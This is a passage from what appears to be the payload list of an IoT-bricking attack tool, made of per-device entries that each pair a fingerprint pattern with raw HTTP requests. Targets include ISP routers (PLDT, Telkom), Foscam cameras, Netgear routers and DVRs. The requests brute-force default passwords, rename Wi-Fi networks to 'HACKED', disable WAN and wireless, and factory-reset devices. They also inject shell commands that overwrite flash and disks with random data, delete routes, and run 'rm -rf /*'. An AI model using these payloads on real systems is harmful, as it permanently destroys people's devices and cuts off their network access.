/Forms/home_wan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nHiddenFlag=0&wan_VC=PVC0&wanVCFlag=0&Alwan_VPI=0&Alwan_VCI=35&Alwan_QoS=nrtVBR&wan_PCR=0&wan_SCR=0&wan_MBS=0&wanIPVersionRadio=1&wanConTypeFlag=0&wanTypeRadio=Three&wan_IPv6DSLiteEnable=0&wan_IPv6DSLiteMode=0&wan_RemoteAddress=%3A%3A&wan_BridgeSelect=2684+Bridged+IP+LLC&BridgeFlag=0&wanIGMPQitFlag=0&wan_PVCO_Flag=0&PageLockValue=0' , 'POST /Forms/home_wan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nHiddenFlag=0&wan_VC=PVC0&wanVCFlag=0&Alwan_VPI=0&Alwan_VCI=35&Alwan_QoS=nrtVBR&wan_PCR=0&wan_SCR=0&wan_MBS=0&wanIPVersionRadio=1&wanConTypeFlag=0&wanTypeRadio=Three&wan_IPv6DSLiteEnable=0&wan_IPv6DSLiteMode=0&wan_RemoteAddress=%3A%3A&wan_BridgeSelect=2684+Bridged+IP+LLC&BridgeFlag=0&wanIGMPQitFlag=0&wan_PVCO_Flag=0&PageLockValue=0' , 'POST /Forms/adv_adsl_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nModulationType=G.Lite&AnnexTypeA=ANNEX+M&adsl_opmode_apply=SAVE' , 'POST /Forms/adv_adsl_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nModulationType=G.Lite&AnnexTypeA=ANNEX+M&adsl_opmode_apply=SAVE' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , ] , [ 'pldtmydsl' , '^(49\.14[456789]|49\.15[01]|58\.69|112\.20[0-9]|112\.21[01]|119\.9[2345]|122\.[23]|122\.5[2345]|124\.10[4567])\.\d+\.\d+%%%.*200 Ok.*Server: microhttpd.*no-cache.*/index.html' , 'POST /login/login-page.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nAuthName=admin&AuthPassword=1234' , 'GET /index.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSION=%%CUSTOM1%%\r\nReferer: http://%%TARGETIP%%/login/login-page.cgi\r\n\r\n' , 'POST /pages/tabFW/wireless-general.wl HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: tabJson=..%2Fnetwork%2Fwireless%2Ftab.json; tabIndex=0; SESSION=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsessionKey=%%CUSTOM1%%&wlSyncNvram=1&wlDevice=0&wlHide=0&wlAPIsolation=0&wlBssidIsolation=0&wlEnableWmf=0&wlEnableButtom=0&wlExWpa=&wlSsidIdx=0&wlSsid=HACKED&wlAuthMode=psk+psk2&wlWep=disabled&wlAuth=0&wlUseDefaultWpaKey=0&wlWepPassphraseKey=&wlWpaPassphraseKey=&wlEmailEnable=0&wlSelectEmailSend=&wlSendEmailTo=&wlSendEmailTitle=&wlObssCoex=1&wlBand=2&wlEnbl=0&wlChannel=0&wlNBwCap=1&wlNCtrlsb=1&wlPassphraseUI=0&wlSsid_PLDT=HACKED&wlMaxAssoc=64&wlMaxBandwidth=&wlMaxDownBandwidth=&WireLess_EmailSelect=&WireLessSendEmailTitle=&WireLessSendEmailTo=&wlWpa=tkip%2Baes&wlWpaGtkRekey=1800' , 'GET /pages/tabFW/wireless-generalrefresh.wl?wlRefresh=0 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: tabJson=..%2Fnetwork%2Fwireless%2Ftab.json; tabIndex=0; SESSION=%%CUSTOM1%%\r\n\r\n' , 'POST /login/login-page.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nAuthName=%%LOGIN%%&AuthPassword=%%PASSWORD%%' , 'POST /pages/connectionStatus/connectionStatus-SetpppDown.cgi?intfName=ppp1&sessionKey=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSION=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'pldtfibr' , '302 Redirect.*GoAhead-Webs.*PeerSec-MatrixSSL.*1.1/login.html' , 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=adminpldt\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=adminpldt&Passwd=0123456789' , 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=adminpldt\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=adminpldt&Passwd=1234567890' , 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=admin\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=admin&Passwd=1234' , 'POST /goform/wirelessBasic HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nradiohiddenButton=2&radio_on=0&wirelessmode=4&select_regDomain=3&Fre_band=2&sz11aChannel=0&guard_inter=0' , 'POST /goform/setAccountSelfPwd HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naccountSelf_user=%%LOGIN%%&accountSelf_oldPwd=%%PASSWORD%%&accountSelf_newname=&accountSelf_newPwd=%%NEWPASSWORD%%&accountSelf_newPwd2=%%NEWPASSWORD%%' , 'POST /goform/webLogin HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=adminpldt\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUser=adminpldt&Passwd=%%NEWPASSWORD%%' , 'POST /goform/APSecurity HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nssidIndex=1&SSIDEnable=disable&bssid_num=1&ssidName=HACKED&secure_WMM=1&security_mode=WPAPSKWPA2PSK&security_shared_mode=WEP&wep_default_key=1&WEP1=&WEP1Select=1&WEP2=&WEP2Select=1&WEP3=&WEP3Select=1&WEP4=&WEP4Select=1&cipher=2&passphrase=DefaultPasswordsSuck&PreAuthentication=1&RadiusServerIP=&RadiusServerPort=&RadiusServerSecret=&RadiusServerSessionTimeout=&RadiusServerIdleTimeout=&access_mode=0&addmac=' , 'POST /goform/setLan HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nhostname=&lanIp=10.%%RAND8%%&lanNetmask=255.255.255.0&ipv6_static_addr=fe80%3A%3A1%2F64&other_Flag=1&max_Interval=100&min_Interval=30&dns_srouce=0&Pridns_Set=&secdns_Set=&Prefix_Mode=0&Prefix_Set=&enable_dhcp6s=1&v6dhcpstart=0%3A0%3A0%3A2&v6dhcpend=0%3A0%3A0%3A255' , 'POST /goform/wirelessGetSecurity HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n:""' , 'POST /goform/APSecurity HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nssidIndex=1&SSIDEnable=disable&bssid_num=1&ssidName=HACKED&secure_WMM=1&security_mode=WPAPSKWPA2PSK&security_shared_mode=WEP&wep_default_key=1&WEP1=&WEP1Select=1&WEP2=&WEP2Select=1&WEP3=&WEP3Select=1&WEP4=&WEP4Select=1&cipher=2&passphrase=DefaultPasswordsSuck&PreAuthentication=1&RadiusServerIP=&RadiusServerPort=&RadiusServerSecret=&RadiusServerSessionTimeout=&RadiusServerIdleTimeout=&access_mode=0&addmac=' , 'GET /lang/en/wireless.xml HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\n\r\n' , 'GET /management/account_self_admin.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\n\r\n' , 'POST /goform/WanCfg HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwan_enable=0&wan_connectionmode=100&wan_connectionType=0&wan_vid=1030&wan_priority=0&nat_enable=0&dns_enable=0&wan_mtu=1500&wan_feBox=1&wan_ssidBox=1&wan_ssidBox=4&ipv6_enable=0&ipModel=0&AFTR_value=&staticIp=&staticNetmask=&staticGateway=&staticPriDns=&staticSecDns=&staticIp_ipv6=&Prefix_Length=&IPv6_Gateway=&IPv6_Pri_DNS=&IPv6_Sec_DNS=&Address%2FPrefix_static=2&Prefix_static=2&IPv6_prefix=&Address%2FPrefix_dhcp=0&Prefix_dhcp=0&pppoeUser=&pppoePass=&pppoeOPMode=0&pppoeRetryPeriod=&Address%2FPrefix_pppoe=1&Prefix_pppoe=0&wApply=Apply&fw_curIndex=0' , 'POST /goform/reboot HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n:""' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'foscamold' , 'Server: Netwave IP Camera' , 'GET /camera_control.cgi?param=1&user=admin&pwd=&value=0 HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET /camera_control.cgi?param=2&user=admin&pwd=&value=0 HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET /camera_control.cgi?param=5&user=admin&pwd=&value=3 HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET /set_network.cgi?next_url=rebootme.htm&user=admin&pwd=&ip=10.%%RAND8%%&mask=255.255.255.0&gateway=10.%%COMP8%%&dns=1.2.3.4&port=%%RANDPORT%% HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET /set_wifi.cgi?next_url=rebootme.htm&channel=5&user=admin&pwd=admin&enable=0&ssid=&mode=0&encrypt=0&authtype=0&keyformat=0&defkey=0&key1=&key2=&key3=&key4=&key1_bits=0&key2_bits=0&key3_bits=0&key4_bits=0&wpa_psk= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET /set_pppoe.cgi?next_url=rebootme.htm&enable=0&user=admin&pwd= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET /reboot.cgi?next_url=reboot.htm&user=admin&pwd= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET /restore_factory.cgi?next_url=reboot.htm&user=admin&pwd= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'telkomdlink' , '^(105\.18[4567]|105\.22[456789])\.\d+\.\d+%%%.*Server: microhttpd.*Set-Cookie: Name=;' , 'POST /index.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nusername=support&password=TelkomDlink12345&validateCode=' , 'GET /internet.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' , 'GET /wlcfg.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\nReferer: http://%%TARGETIP%%/internet.html\r\n\r\n' , 'GET /wlcfg.wl?wlSsidIdx=0&wlEnbl=0&wlHide=0&wlAPIsolation=0&wlSsid=TELKOMHACKED&wlCountry=ZA&wlEnbl_wl0v1=0&wlEnbl_wl0v2=0&wlEnbl_wl0v3=0&wsc_config_state=1&wlSyncNvram=1&sessionKey=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' , 'GET /setup_wancfg.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' , 'GET /dlwancfg.cmd?action=remove&rmLst=ppp0.1&sessionKey=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'aztechweb' , 'K;Content-type: text/html;charset=ISO-8859-1.*domtabadv\.css' , 'GET /cgi-bin/login.cgi?username=admin&password=admin HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'GET /cgi-bin/login.cgi?username=admin&password=bayandsl HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'GET /cgi-bin/login.cgi?username=admin&password=epicrouter HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'GET /cgi-bin/login.cgi?username=admin&password=password HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'GET /cgi-bin/login.cgi?username=admin&password= HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'POST /cgi-bin/netLan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSIONID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsaveFlag=1&lan_VC=0&lan_Alias_VC=0&aliasFlag=No&defaultRoute=0&defaultRoute_isp=2&staticNum=0&delnum=&tmpStartIp=10.0.0.3&tmpPoolCount=252&option60Flag=No&isIPv6Supported=0&ipv6Flag=0&lan2Wan=No&dhcpethdis=No&dhcpethen=Yes&uiViewIPAddr=10.%%RAND8%%&dhcpFlag=0&lanFlag=0&DNSproxy=Yes&uiViewNetMask=255.255.255.0&dhcpTypeRadio=1&StartIp=10.0.0.3&PoolSize=252&dhcp_LeaseTime=86400&dnsTypeRadio=0' , 'POST /cgi-bin/wlBasic.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSIONID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsaveFlag=1&N_wlan_APenable=0&BasicRate_Value1=15&BasicRate_Value2=3&BasicRate_Value3=351&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&HTMCSAUTO=33&HTBW=0&WPSConfigured=2&WpsConfModeAll=7&WpsConfModeNone=0&Is11nMode=1&ExtChannFlag=0&isInWPSing=0&CountryName=SOUTH+AFRICA&BssidNum=1&WpsStart=0&WpsOOB=0&BUTTON=SAVE&wlanWEPFlag=3&ESSID=HACKED&bssid_num=1&ESSID_HIDE_Selection=0&WirelessMode=9&BeaconInterval=100&DTIM=1&FragmentThreshold=2346&RTSThreshold=2347&Countries_Channels=SOUTH+AFRICA&Channel_ID=6&WLANChannelBandwidth=1&WLANGuardInterval=1&WLANMCS=33&WLANExtensionChannel=0&CountryChange=0' , 'POST /cgi-bin/quickstart.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSIONID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npage=home.asp&saveFlag=1&wanVCFlag=&vEnable=0&vSSID=0&timeType=0&AuthMode=WPAPSKWPA2PSK&TKIP_Selection=TKIPAES&TypeFlag=2&commit=1&select=PPPoE+LLC&wan_VCStatus=Yes&ATM_QoS=ubr&ATM_PCR=0&ATM_SCR=0&ATM_MBS=0&wan_NAT=Enable&wan_DefaultRoute=Yes&wan_TCPMTU=0&wan_RIPVersion=RIP1&wan_RIPDirection=None&wan_IGMP=Disabled&wan_ConnectSelect=Connect_Keep_Alive&wan_IdleTimeT=&wan_TCPMSS=0&wan_PPPGetIP=Dynamic&wan_StaticIPaddr=&wan_StaticIPSubMask=&wan_StaticIpGateway=&N_linktype=eth0.4&N_macEnbl=0&N_clonemac=N%2FA&ftthPVC=7&ftthDefRoute=No&wan7ifname=eth0.4&wan_VC=0&wan7Active=Yes&lan2Wan=Yes&dhcpethdis=No&lan_VC=0&dhcpTypeRadio=1&uiViewdateTZ=GMT%2B03%3A00&uiViewSNTPServer=igubu.saix.net&Custom_NTP_Server=igubu.saix.net&daylight=Disable&wan_connType=WAN&3g_apnMeth=list&3g_countryList=0&3g_opList=0&3g_apnList=0&3g_apn=&3g_authType=0&netType=AUTO&3g_connMethod=1&3g_idleTimeout=N%2FA&3g_umtsdialnumber=*99%23&3g_umtsusername=&3g_umtspassword=&3g_umtscpin=&conn_type=1&uiViewUserNameMark=guest%40telkomadsl&uiViewPasswordMark=guest&wzStatic_IPaddr=&wzStatic_SubMask=&wzStatic_GatewayAdd=&dns1=&dns2=&wzDHCP_VPI=8&wzDHCP_VCI=35&ESSID_HIDE_Selection=on&wireless_ssid=HACKED&wpaenable=on&PreSharedKey=802325481036364884' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'netgeardgn1022' , '(NETGEAR DGN1000|NETGEAR DGN2200)' , 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/dev/urandom+>/dev/root&curpath=/¤tsetting.htm=1 HTTP/1.0\r\n\r\n' , 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=route+del+default&curpath=/¤tsetting.htm=1 HTTP/1.0\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'netgearr7064' , '(NETGEAR R7000|NETGEAR R6400)' , 'GET /cgi-bin/;cat$IFS/dev/urandom$IFS>/dev/root HTTP/1.0\r\n\r\n' , 'GET /cgi-bin/;route$IFSdel$IFSdefault HTTP/1.0\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'vacron' , '(VACRON NVR|Boa.*title>DVR LOGIN<\/ti)' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock0 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock9 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock10 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/sda1 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock1 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock2 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock3 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock4 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock5 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock6 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock7 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock8 HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/root HTTP/1.0\r\n\r\n' , 'GET /board.cgi?cmd=route%20del%20default HTTP/1.0\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'jaws' , 'Server: JAWS' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/sda1 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/sda2 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock0 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock1 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock2 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock3 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock4 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock5 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock0 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock1 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock2 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock3 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock4 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock5 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%220%22%20squ=%22abcdefg%22%20dir=%220%22%20enc=%221%22%3E%3Cenvload%20type=%221%22%20usr=%22admin%22%20pwd=%22%22%3E%3Cscreen%20chn=%220%22%20title=%22HACKED%22/%3E%3Ccopyg%20chn=%220%22%20type=%225%22%20channels=%22255%22/%3E%3C/envload%3E%3C/juan%3E&_=1510387268908 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\nCookie: dvr_camcnt=8; dvr_clientport=80; dvr_sensorcnt=4; lxc_save=admin%2C; dvr_usr=admin; dvr_pwd=null; iSetAble=1; iPlayBack=1\r\n\r\n' , 'GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%220%22%20squ=%22abcdefg%22%20dir=%220%22%20enc=%221%22%3E%3Cenvload%20type=%221%22%20usr=%22admin%22%20pwd=%22%22%3E%3Cnetwork%20ip=%2210.%%RAND8%%%22%20gateway=%2210.%%COMP8%%%22%20dns=%2210.%%COMP8%%%22%20enetid=%2221391293%22%20pppoe=%221%22%20pppoeusr=%22HACKED%22%20pppoepwd=%22HACKED%22/%3E%3C/envload%3E%3C/juan%3E&_=1510387452140 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\nCookie: dvr_camcnt=8; dvr_clientport=80; dvr_sensorcnt=4; lxc_save=admin%2C; dvr_usr=admin; dvr_pwd=null; iSetAble=1; iPlayBack=1\r\n\r\n' , 'GET /shell?route%20del%20default HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET /shell?cat%20/dev/urandom%20%3E/dev/mem HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'readynas' , 'Apache.*Debian.*Location:\shttp:\S+/admin;Vary' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'mediatekajax' , 'Server: lighttpd/1.*style\.css.*ion\sinit\(\).*ion\sfFOB\(o\).*' , 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=admin' , 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=admin123' , 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=admin1234' , 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=password' , 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=user&UI_ADMIN_PASSWORD=user' , 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=guest&UI_ADMIN_PASSWORD=guest' , 'POST /ajax.cgi?action=net_dhcp HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&DHCPD_STATIC_LEASE=&DHCPD_ENABLE=0&DHCPD_START_IP_01=10&DHCPD_START_IP_02=1&DHCPD_START_IP_03=1&DHCPD_START_IP_04=1&DHCPD_START_IP=&DHCPD_END_IP_01=10&DHCPD_END_IP_02=1&DHCPD_END_IP_03=1&DHCPD_END_IP_04=100&DHCPD_END_IP=&DNS_IP_1=&DNS_IP_2=&DNS_IP_3=&DHCPD_LEASE_TIME=1440&btnSubmit=1&DHCPD_DNS=&ippt_enable=0&IPPT_EXCEPTION=1%2CY%2C1%2C1%2C68%2C67%2CDHCP+request+from+lan%3B2%2CY%2C2%2C1%2C67%2C68%2CDHCP+response+from+wan%3B&IPPT_EXCEPTION_NUM=2' , 'POST /ajax.cgi?action=net_lan HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&LAN_IP_01=10&LAN_IP_02=%%RAND81%%&LAN_IP_03=%%RAND82%%&LAN_IP_04=%%RAND83%%&LAN_IP=10.%%RAND8%%&LAN_MASK_01=255&LAN_MASK_02=255&LAN_MASK_03=255&LAN_MASK_04=254&LAN_MASK=255.255.255.254&btnSubmit=1' , 'POST /ajax.cgi?action=net_bridge_nat_mode HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&LAN_IP_01=10&LAN_IP_02=%%RAND81%%&LAN_IP_03=%%RAND82%%&LAN_IP_04=%%RAND83%%&LAN_IP=10.%%RAND8%%&LAN_MASK_01=255&LAN_MASK_02=255&LAN_MASK_03=255&LAN_MASK_04=254&LAN_MASK=255.255.255.254&LAN_MTU=1500&WAN_OP_MODE=0&WAN_TYPE=0&WAN_IP=&WAN_MASK=&WAN_GATEWAY=&WAN_MTU=1400&dns_type_1=1&DNS_IP_1_01=0&DNS_IP_1_02=0&DNS_IP_1_03=0&DNS_IP_1_04=0&DNS_IP_1=&dns_type_2=1&DNS_IP_2_01=0&DNS_IP_2_02=0&DNS_IP_2_03=0&DNS_IP_2_04=0&DNS_IP_2=&dns_type_3=1&DNS_IP_3_01=0&DNS_IP_3_02=0&DNS_IP_3_03=0&DNS_IP_3_04=0&DNS_IP_3=&btnSubmit=1&WAN_DNS=1%2C0.0.0.0+1%2C0.0.0.0+1%2C0.0.0.0' , 'POST /ajax.cgi?action=manage_snmp HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&SNMPD_ENABLE=1&ROCOMMUNITY=%60rm+-rf+/*%60&RWCOMMUNITY=&SYSCONTACT=&SYSLOCATION=&btnSubmit=1' , 'POST /ajax.cgi?action=net_ddns HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 